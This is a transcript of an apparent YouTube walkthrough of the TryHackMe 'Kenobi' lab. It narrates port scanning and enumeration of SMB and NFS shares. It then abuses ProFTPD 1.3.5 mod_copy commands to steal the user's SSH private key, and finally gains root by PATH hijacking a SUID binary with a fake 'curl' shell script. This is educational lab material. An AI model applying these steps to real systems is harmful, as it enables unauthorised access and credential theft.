 Hello, everyone. My name is John Hammond. It's been a little while since I posted a video. So I wanted to get back on the saddle Today, I'm gonna be looking at the Kenobi room from try hack me So I will hop over to my screen here. So you can see the good stuff and here I am. I'm joined in this room I believe Kenobi is a subscriber only room But it says walk through on exploiting a Linux machine and numerate Samba for shares manipulate a vulnerable version of pro FTB and Escalate your privileges with path variable manipulation. So let's go ahead and spin up this instance I'll hit the deploy button. It says make sure you're connected. So I will have to go do that And try hack me and I will pseudo open VPN my VPN I think at a typo there. It's hard to see my keyboard when there's a microphone in my way. I Could use my headset, but I feel like I just look kind of stupid and dorky Let's make a YouTube Kenobi folder and move in there I'm gonna start a read me so I can keep track of Everything that I particularly do because I think that is good practice I'll also go ahead and specify that this room will have the IP address if I export an IP here This guy So I will go ahead and grab that and slap it in there now I'll go ahead and ping that IP address and looks like he's up Okay, so what we need to do make sure you're connected to our network and deploy the machine Yep did that scan the machine with nmap. How many ports are open? All right So let's head back to our terminal and make a directory nmap and I will nmap tax see SV So save scripts or default scripts numerate versions. I like to use tack on so I can save the nmap directory I will do this all on my IP address and I'll take a trick from optionals book I'll use tack T5 and I think it's max retries. Yeah. Yeah 2,500. So this should make it a little bit faster Hopefully, we'll see maybe it just ruins everything Okay, so now our nmap results are back Let me explain that though that is a T5 So the type or the kind of intensity is insane Let's actually check out those arguments because I didn't do a good job of explaining really what those did Template so fine-grained timing controls discussed the previous section are positive effective Some people find them confusing so you can choose the appropriate values at these different levels Insane is the crazy crazy fast one Does it discuss T5? Yeah, I would always recommend using T4. Some people love T5 though. It's too aggressive for my taste So it's just banging on doors man. And max retries Sets the maximum TCP scandal late to that many me seconds Let's check out what max retries is TAC-TAC max retries Caps number of port scan probe retransmissions, okay So if it dies or if it can't get anything resulting back to it It'll just kind of cap it out at that many retries. Anyway, we have our nmap results So let's go see what we've got here. We've got FTP open with seemingly an old version of pro FTPD SSH is open 80 so it has a website. Oh little robots.tex there admin HTML. We can go check that out RPC bind on 111 Netbios, so Samba. Yep 1097 that's interesting 2049 so that's one two three four five six seven eight that Seems odd to me Maybe that came out because we use those funky Options there. So let's rerun that script and I'll finagle with that when we're submitting our answers How many ports are open so we saw eight from our speed scan? But I believe the correct answer is seven because that other one I think came out of the blue 1097 so that Hopefully showcases both the syntax of using those speed scans in nmap and how you might be kind of gambling As to what you might find we saw that the port was filtered So that was kind of cool It kind of give us a little inclination that maybe that's not right It's not particularly open and I guess that is what it's asking for so seven ports are in fact open I hadn't seen that before when I had scanned this previously. There we go Nope, no more 1097. Okay. Let's go on to task two just for our notes. I'll do a task one Let's do a no answer needed for him To how many ports are open? I Just like to document and that probably takes away some time from the video But I do want to emphasize hey That's super duper important take notes and that way you'll have that ready for you in the future All right using nmap We can enumerate machine for SMB shares and my piece ability to do this with a wide variety of networking tasks There is a script to enumerate shares So this is awesome because it's getting into a little bit of the nse or the nmap scripting engine looks like we're going to specify that port 4 4 5 where we would typically see the information for SMB later versions of SMB after windows 2000 began to use port 4 4 5 on top of a TCP stack using TCP allows that to work All right, and we can use tack tack script to specify an nse script and again I think I've showed before you could run locator try and track down the file extensions that have a dot nse Files that have a dot nse file extension. Let me just specify our port here. So let's go ahead and do that. I Will end map this guy. I'll also save that output to nmap SMB scan And since we saved our variable as an IR IP address as an environmental We can go ahead and run that so this is going to be great because it's going to enumerate all of the SMB shares of the kind of File directories that are accessible to us on the network that is publicly sharing. We can also try to enumerate users I like to typically use enum for Linux or that tool opt enum for Linux to do this as well I stored in my op directory. It's not actually called enum for Linux But we could supply the host or the IP address and that is in here Looks like he actually has that a okay, so What did I just type enum for Linux and The IP address so that could spin off as well and we could look for what it will track down for shares or users So this got some results here. Let's go ahead and take a look at this We have an account with guest looks like a hidden share You can notice hidden or it's kind of intended to be hidden with the dollar sign at the end there has an anonymous share We have access to rewrite in it. It looks like it puts us in home Kenobi share on the file system So that's kind of interesting print is in there. That's pretty common So you'll often see IPC and print those are normal or can be normal anonymous looks peculiar So let's go ahead and take a look at that. How many shares were found we found three in total? We'll just grab that and save it in our notes. Wow. I took the entire paragraph. I hate highlighting with my mouse One we found a total of three All right, what else do we have to do in here most distributions of Linux carry SMB client So let's use that to inspect one of the shares So we can use the syntax SMB client and then whack whack or two forward slashes on the IP address and specifying the share with another forward slash and Anonymous being the share that we want to access using your community will connect the networks machine Using your machine it will connect to the machine's network share once you connect it list the files in the share What is the file you can see? Let's go check it out. How did he know for Linux do he's still going? Okay, he found the exact same shares anonymous print etc Very very cool. Looks like he's kind of brute-forcing IDs and stuff like that. We don't need to worry about that Let's go ahead and run SMB clients. I do have that readily available to you I don't know if it is installed you might need to pseudo app install SMB client or some Samba tools or stuff like that Let's go ahead and run that command though SMB client with the IP address and I'll use the anonymous share It's going to want to know my password because I didn't specify username So it's going to use mine and ask for mine by default That doesn't matter because we're just going to kind of use anonymous access So if I just whack enter it will let me log in. I'm not specifying a password the users in particularly matter We have anonymous access on this So I'll type in LS to list some files out and we can see there is a log dot text file here on that share Let's go ahead and supply that I'll give that as our answer here for number two Good good. You can recursively download the SMB share to submit the username and password as nothing just as we did SMB get that's kind of cool. I haven't actually used this tool before So this is kind of some new learning for me and that's what it's all about, right? SMB Using kind of a schema here to preface our IP and the share. So let's go ahead and do that I will actually break out of this guy and I'll make directory Samba so I can put those all in a specific place and it's SMB get tack capital R If you want to check out the other arguments and parameters you can pass to SMB get again You've got the man pages W get like utility for downloading files over SMB So that tack capital R is recursive and a little download just about everything. Let's do it Let's use SMB get tack capital R SMB as our schema IP address Anonymous and again Gonna ask for a password just whack enter. It should be able to pull some stuff down might be a little bit Let's find out. Oh, he got it. He got log dot text. Okay, sweet What is in that log dot text? Whoa a lot of seemingly interesting stuff. Okay Generating a public and private RSA key payer Generating a file In okay curly the directory home Kenobi SSH. Oh, so they're making an SSH key Simmingly no password. Maybe we don't need there. We don't know if that's their input in there So they've saved their private key and their public key. Oh We also have pro FTBD We did see that as a service. Okay. Looks looks like the config file for it default port. Oh It's running as Kenobi, which is kind of interesting because maybe We could potentially reach that SSH key the fault route is commented out. So they're in a jail thing Normally want files to be available on overwrite Anonymous puts us in there All the service is running as Kenobi so we probably have access to what Kenobi can access We also have SMB Or our Samba share A lot of information in that There's a lot of comments here. This is kind of hard to scroll through We could very well write to that directory though. It's worth a try. Yeah read-only Doesn't seem to be particularly concerned Anonymous browsable. Yes read-only. Yes guest. Okay. Yes, huh. Is it really read-only? Oh Maybe for the person accessing the share but not on the actual file system. It's just gonna show that location So if we were to use some other technique to move the SSH private key into the share We could still access it as a user Reading and reaching into the share So maybe we'll have to use some other technique here. They ask us. Okay. What port is FTP running on? Well, we already found that from our end map scan. Let's go ahead and submit that that's number two That's sorry. That's number three here What port is FTP on? Did I just copy that text? Yeah, I did 21 just good to keep notes And they're going to mount some information our earlier end map scan provided that 111 is running rpc bind RPCs prepared it tells rpc bind the address which is listening and the rpc program number prepared to serve In this case, it can access a network file system. So we have some network shares Now, I typically see this on like port 2049 right because nfs But I guess those are kind of paralleled and pulled together Let's hop out of this directory and go see what that has what I do typically for this is because it's using show mount Oh, um, is that the right ip address? I think so Yeah, yeah, yeah, whatever. I'll just change that and it shows me that there is a var File or folder there. I would do that with show mount. So show mount tacky and then the ip address which I need to go ahead and add in here show mount tacky tack ip Or dollars on ip and that will tell me the exact same information So var is a folder we could go ahead and access and mount. So that's what they were asking for here Let's go ahead and submit that what mount can we see? Let's go slap that into our notes I literally just copied and pasted this. Why am I typing it out? I've done this like out of habit for the last couple videos and or like things that I've been doing for my own recording Just for me to go through some try-hack me stuff It's just habit hand jamming everything in Because copying and pasting is so frustrating pro fdpd. Okay. So now we're taking a look at that fdp server pro fdpd Is a free and open source fdp server compatible with windows and windows linux and windows. Well It's been a while since I made a video It's also vulnerable in some past software versions. Okay, we get the version of our pro fdpd Let's use netcat to go check that out. So you could do a simple banner grab with netcat We could just connect cat to that ip address on port 21 and it'll tell me hey, that's the version We also saw that in our results Between our nmap scan. So that's kind of pretty easy and handy to find out What what is the version? 1.3.5 We can use searchploit to find exploits for particular software versions Searchploit is basically just a command line search tool for exploit tb.com. It's pretty awesome How many exploits are there for pro fdpd running? So if you haven't heard of searchploit before I do want to showcase this because it's fantastic If you go check out offensive securities exploit db github They do have hey like a github local locally available copy of their entire exploit database that you'd normally navigate through online They also offer a command line tool searchploit that lets you go ahead and look through all of those entries in the database So if you can grab just the software name or the software version number you could pretty easily Okay, let's see what does the public already know about this. Is it vulnerable? Is there anything I can exploit? So there's some really cool stuff And let's normally what I would do is I would get clone this So in my op directory because that's where I tend to store a lot of my tools I have my exploit db directory And searchploit is in there. So I would just create this as a prompt I'd modify my prompt to allow myself to just run searchploit from anywhere I'd like to be So I was in try hack me youtube kanobi and I could just run searchploit And there we go. Now I have all the arguments But normally searchploit is pretty easy to use because you could just specify What it is that you're looking for as search terms like literally just arguments following that and it'll find stuff for you. So let's check this out. If I run searchploit on pro ftpd version 1.3.5 Now we've got some results. So it looks like it's asking for how many we found and we found three Let's go check that out taking good notes You probably hate me for it But I just want to showcase it. You should have found an exploit from pro ftpd's mod copy module The mod copy module implements site cpfr and site cp2 commands Which can be used to copy files and directories from one place to another on the server Any authenticated client can leverage these Unauthenticated client. So we don't need to know any credentials. We don't need to know kanobi's password We don't know to know any other users credentials to log into that ftp service We can just do it via netcat, which is kind of cool Copy files from any part of the file system to hshows and directory So we know that the ftp service is running as the kanobi user from the file on the share We saw that that log dot text file and an ssh key was generated for that user So we could potentially pull that ssh key into a location that we can read and access and then Pull it in and then use it and then ssh as that user kanobi. So let's go ahead and do that If you want to take a look at some of these i'll use searchploit I'll actually just grab this Text file because it will go and explain it you can use tack x with searchploit to examine An entry given in the path there so you can just copy and paste that in And this will kind of talk about hey what syntax is really kind of being in place for this sort of attack And that he's going to use these site cpfr commands to say this is the file that I want to copy This is where I want to copy it to And they're actually using a really cool technique here because they're using PHP perhaps on the website so they could potentially Create some PHP code Into port 80 or what's being served on the web page and then because that page will be rendered with PHP You could potentially get remote code execution and execute code and commands. Maybe we could do this too I don't think i'm going to go into that in this video But I when I when I used to teach and I taught the cyber threat emulation course This is something that I actually baked into the course was this exact exploit pro ftp d 1.3.5 showcasing the mod copy technique And showing that we could gain code execution and the metasploit module actually does that So if you want to go check out the source code of the metasploit module like checking this out This is pretty neat You can see here's a description that you would normally see within metasploit You could scroll through and see what arguments parameters and options they set and It'll walk through the actual exploit in Ruby, which is very very cool They use some interesting techniques because they use prox self command line Which will allow you to include the php payload to get the remote code execution Um, I I used this in the classroom because it was kind of cool And that there were only three exploits But they showcase different ways of doing the same technique the text file just explained it Showcase some syntax the metasploit module showcases really really well But I was trying to say hey not all the time can we use metasploit? We don't always want to do that We kind of want to understand the exploit and see how we can weaponize it and write it ourselves And we were doing that in the class typically within python because pythons like My golden sword, right? I love that thing. So we would take a look at this Python code that someone has an exploit written in for but it's kind of weird and that okay. It's old python 2 Um, it's kind of hard to read really pretty difficult to look at but you can see what they're doing for including commands Um, they include it just as an argument and then that's a static command You can't modify that or change that with like a get variable or post variable And the way that they use that prox self file descriptor is kind of just a guess on what socket or what file descriptor is actually open for that Um, so using the prox self command line as their copy from is a much better Technique because it'll ensure that your php code is actually visible and can be copied for Writing to the file server writing the web server being able to see that php page and have it be executed as you access it so anyway, sorry tangent, uh, just some Tinkering thoughts of teaching and showcasing this exploit and what you can do with it Anyway, we know that it will allow us to copy one file to another location In the file system unauthenticated and because the fdp server is running as the kanobi user We could access kanobi's files his ssh key and potentially put it Maybe in the samba shear so we could access it. So try hack me includes a pretty nice picture just to showcase this Um, netkating to the ip address using the site cpfr commands and site cp2 You should be able to see these kind of partial responses from the fdp server. So let's go ahead and do that Let's go do our netcat ip address port 21 So let's use our site cpfr. So copy from home kanobi dot ssh id rsa because that's his private key And we know the location of this NFS share as well. It's also in var temp or slash var, right? that's what it's sharing for us and We could just create a directory in their temp and copy our idsa file over there. So let's do that. Let's use site cp2 Slash var. Let's make a temp directory and id rsa and that successfully copy it So if I were to go use smb client one more time Where I went over to That ip address on the anonymous share Empty password now we can go ahead and check out ls. Um, we Seemingly do not have that temp directory tt temp. Nope Is it just not there? Let's try that netcat syntax again site cpfr Can I put it in just var id rsa? Nope. Okay. So I need to have a directory there. How do they do this? Oh, maybe it's just not showing it as we read it. We need to mount that temp directory to our machine Or as var the Share that it's sharing but not the actual file system because if we look at temp Hmm, we could check out that log dot text file and see what it's really sharing. We have that in samba A little bit of learning for me. Okay anonymous puts it in home kanobi share And that's all oh the mount the amount is different I was going the wrong thing. I was using the nfsh I was connecting to the smb share when I should have been connecting to The var That is an nfshare Sorry, I got confused Let's go ahead and make a directory that we can go ahead and copy this too. So let's make directory um Let's just call nfs and they're going to use mount with the machine ip address colon var and that's going to understand. Okay, this is an nfshare We're going to connect it to and I'll put it in the nfs directory. So let's do that. Let's use mount. Um It's rip for the box var at to nfs The directory that we just created looks like I need to be root. So let me pseudo that Takes a second because there's probably a lot to boot in there. Okay. Yep. So let's now move into that nfs directory that we just made And let's see what we have Seemingly the file system. Okay. So because we put it in temp Now we have an idrsa file in there. So that's going to actually be Kenobi's ssh key. Let's go ahead and copy that out up up up And because that's all we needed I'm actually going to Pseudo you mount nfs. So when I disconnect from the vpn, it doesn't get all messy and make that folder hang every single time There we go Let's say that we've done that And we need to now use that idrsa key to ssh into the kenobi user. So let me go ahead. I will uh make that idrsa permissions 600 with ch mod so only I can read it and it's a safe and secure ssh key that ssh will be willing to use And I'll specify kenobi at our ip address And I need to specify the dollar sign ip address because it will resolve the variable. Yes I'm totally cool to connect to it and there we go. We're in we are logged in as kenobi So what do we have in here? We have our user dot text flag Which we need to go ahead and submit For that answer here. Oh, we hadn't been taking notes. My bad Who cares? Don't actually have that mentality We get initial access. Why is that still wrong? Okay, we need to mark some of these things as completed sorry Now we're moving on to the task four privilege escalation with path venerable path variable manipulation Okay, so we're talking about some set uid binaries. Let's first understand what s at uid sg id and sticky bits are su id bit allows the user that executing the file having the permission of the owner of the file So if I executed something as Kenobi and that file were owned by root if it were a set uid bit I would still be operating everything that that binary or that program would do Or that file would do as the root user. So that's awesome because that's potentially a privsk sg id sticky bit su id bits can be dangerous Yep, potentially a privsk some binaries such as password Like the command password need to be ran with elevated privileges as it's resetting your password in the system However, other custom files that have this su id bit can lead to all sorts of issues to search the system for these files Run the following. Okay, so they give us a good fine command to use here Let's go ahead and run that So this will look for the permissions that have a sticky or sorry that s representing a set uid bit And looking for files and all the standard errors being redirected to nowhere So looking through this There are a few of here that kind of look normal and I guess the understanding and exposure of what looks normal Is just kind of from experience from just doing this a little bit more Or you could use your own host system as a baseline. So I'm connected to kanobi down here on my bottom And I'll actually change the color here So you can see that that is the target and this down here is my host if I ran that same command We could see all the weird binaries on my system that are set uid I don't happen to have Some of the ones that they have but I see su I see ping mount the others etc. U mount is in there Pseudo is in there I don't see user bin menu. So user bin menu kind of sticks out to me as odd and strange and weird Maybe that's something custom. So let's copy that And submit that as our answer For this guy and that's correct now run the binary how many options appear. Okay, so let's go ahead and Run here It's a status check kernel version and if can fix. So there are three options And we could try some of these status check. Okay, it looks like it made an http request interesting What does the kernel version do? Okay, that tells us something from uname tack a potentially Oh If config it's just going to run that command, huh? So strings is a command on the next that looks for human readable strings on a binary So if I were to run strings on that user bin menu We could look for some of the things that maybe that's doing Looks like status check. Okay, that's actually going to run curl on our local host kernel version We know uname tack r and if config will run potentially if config We don't know for sure because we aren't looking at the source code here We're just looking at the strings in the binary, but Because these are running commands Without kind of a fixed path like without the absolute path. It's just curl whatever happens to be in your path first And it's running as a set uid binary. Let me show you that ls tack l You can see it's rws for that set uid You can see it's kind of all in red and noted that hey, this is owned by root So set uid binary this command will execute as the context of the root user so We can abuse this because we know, okay, it's running curl and we could kind of create our own Curl binary that's going to happen or be executed first because we can put that higher up in our path And make that executable. You can see try hack me includes a good picture for this. Let me show you that Let's just copy bin sh or bin bash I'll do that and I'll make it a curl directory right in here or a curl file So I have dot slash curl, which is going to give me another bash shell So I'll exit that And go back to my regular shell But now that we've created this binary named curl and it's going to have the same name as what this program tries to run If we modify our path to call that binary first because it's executing as the permissions as root With the set uid binary. It should give us a root shell. So let's do that. We could check out our path variable And we could actually modify our path variable if I say let's export path to our current directory, right home Kenobi It actually has been in there as a potential path. So we could let's let's use both. Let's say home Kenobi let's modify that separate with a colon because that is a delimiter for path variable and Let's include the rest of the path variable inside of it here So now that we've set that we could go with an echo path and you can see my home directory home Kenobi is just in there Just as well. So if I run curl by default now, it's going to give me a bash shell Rather than running the curl command because it's reaching that path first in the path expansion path variable expansion So now if I were to try and run our user bin menu And if I were to go ahead and check our status It looks like we don't have curl localhost that happened because it's Executing that binary and not including tagp That might be how it's done They use a echo command which is interesting to me Because it might just be executing that simply As a script potentially Making a lot of flops in this video Let's let's let's change that up. Let's rmr curl And let's now make a echo bin bash That's kind of just a simple file or a script Cat curl. It's going to run bin bash Now let's run our user bin menu and choose one Now it didn't do that whatsoever kind of peculiar Maybe we could use our sh. So they put it in temp bin sh Maybe sh will keep the permissions rather than bash So let's just try it in our curl one more time if I were to run curl Oh, I still need to mark it as executable. So that's probably why I didn't run earlier If I were to curl now I have a regular shell If I were to run our menu Now I have the root shell Does sh keep its permissions without specifying an argument because bash I know you probably need the tagp. Let's try doing that with bash rather than using echo Or while using echo rather than making a binary Let's just have it be kind of a file to execute that is a script and then it will run bash tagp into curl So now when I run curl gives me a shell if I go back to run my menu If I run status check now I'm root. Okay, so sh excuse me sh does not need to have that tagp argument to kind of maintain the permissions bash does So now that I'm root, okay Let's go ahead into my root directory and I have a root flag in there so we can cat that out and call that box done Okay, so real box real video real thing Obviously, I made a couple mistakes in there, but hopefully those showcase some learnings not just for me, but also for you and It's cool and peculiar because well, maybe we didn't need to even specify our own Um Addition to the path because we saw when we checked out that path variable We also already had home Kenobi bin and we could very well just create that directory We could have made that not having to modify that path variable since it already has some of our own locally writable locations in there Okay, I'm losing some steam. I am uh gonna call this video done I'm gonna wrap this up and say okay cool. We completed Kenobi. I hope you guys enjoyed I hope you liked this video. Uh, if you did, please do press that like button do the youtube algorithm things Leave a comment say whatever you want say Whatever you want Subscribe would be great. I'd love to see you guys on the discord server patreon paypal LinkedIn twitter All these stuff all the internet things All right, I'll see you guys later. Thanks so much for watching. Take care